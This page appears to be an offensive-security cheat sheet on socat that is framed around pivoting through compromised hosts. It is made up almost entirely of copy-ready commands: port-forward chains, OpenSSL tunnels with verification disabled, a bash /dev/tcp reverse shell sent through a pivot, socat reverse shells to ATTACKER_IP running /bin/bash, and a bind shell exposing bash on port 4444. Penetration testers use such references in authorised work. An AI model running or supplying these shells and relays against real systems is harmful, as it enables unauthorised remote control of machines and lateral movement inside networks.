> ## Documentation Index
> Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
> Use this file to discover all available pages before exploring further.

# Socat

> Socat port forwarding and relays: TCP redirects, encrypted tunnels, and pivoting through compromised hosts.

## Install

```bash theme={"dark"}
apt install socat
```

Standalone binary: [https://github.com/andrew-d/static-binaries](https://github.com/andrew-d/static-binaries)

***

## Port Forward (TCP Redirect)

Forward traffic from one port to another host.

```bash theme={"dark"}
socat TCP-LISTEN:8080,fork TCP:TARGET_IP:80
```

Access `PIVOT:8080` → reaches `TARGET_IP:80`.

### Background

```bash theme={"dark"}
socat TCP-LISTEN:8080,fork TCP:TARGET_IP:80 &
```

***

## Reverse Shell Relay

### Attacker — Listener

```bash theme={"dark"}
nc -lvnp 4444
```

### Pivot — Relay

```bash theme={"dark"}
socat TCP-LISTEN:9999,fork TCP:ATTACKER_IP:4444
```

### Target — Connect

```bash theme={"dark"}
bash -i >& /dev/tcp/PIVOT_IP/9999 0>&1
```

Target → Pivot:9999 → Attacker:4444.

***

## Port Forward Chain

```bash theme={"dark"}
# Pivot1: forward 8080 → Pivot2:9090
socat TCP-LISTEN:8080,fork TCP:PIVOT2_IP:9090

# Pivot2: forward 9090 → Internal:80
socat TCP-LISTEN:9090,fork TCP:INTERNAL_IP:80
```

***

## Encrypted Tunnel (OpenSSL)

### Generate Cert

```bash theme={"dark"}
openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out cert.pem
cat key.pem cert.pem > socat.pem
```

### Encrypted Listener

```bash theme={"dark"}
socat OPENSSL-LISTEN:443,cert=socat.pem,verify=0,fork TCP:TARGET_IP:80
```

### Encrypted Client

```bash theme={"dark"}
socat TCP-LISTEN:8080,fork OPENSSL:PIVOT_IP:443,verify=0
```

***

## Bind Shell

### Target

```bash theme={"dark"}
socat TCP-LISTEN:4444,reuseaddr,fork EXEC:/bin/bash,pty,stderr,setsid,sigint,sane
```

### Attacker

```bash theme={"dark"}
socat FILE:`tty`,raw,echo=0 TCP:TARGET:4444
```

***

## Reverse Shell

### Attacker

```bash theme={"dark"}
socat FILE:`tty`,raw,echo=0 TCP-LISTEN:4444
```

### Target

```bash theme={"dark"}
socat TCP:ATTACKER_IP:4444 EXEC:/bin/bash,pty,stderr,setsid,sigint,sane
```

***

## UDP Forward

```bash theme={"dark"}
socat UDP-LISTEN:53,fork UDP:DNS_SERVER:53
```

***

## Quick Reference

| Task          | Command                                          |
| ------------- | ------------------------------------------------ |
| TCP forward   | `socat TCP-LISTEN:PORT,fork TCP:TARGET:PORT`     |
| Reverse relay | Listen on pivot, forward to attacker             |
| Encrypted     | `socat OPENSSL-LISTEN:443,cert=socat.pem...`     |
| Bind shell    | `socat TCP-LISTEN:4444... EXEC:/bin/bash,pty...` |
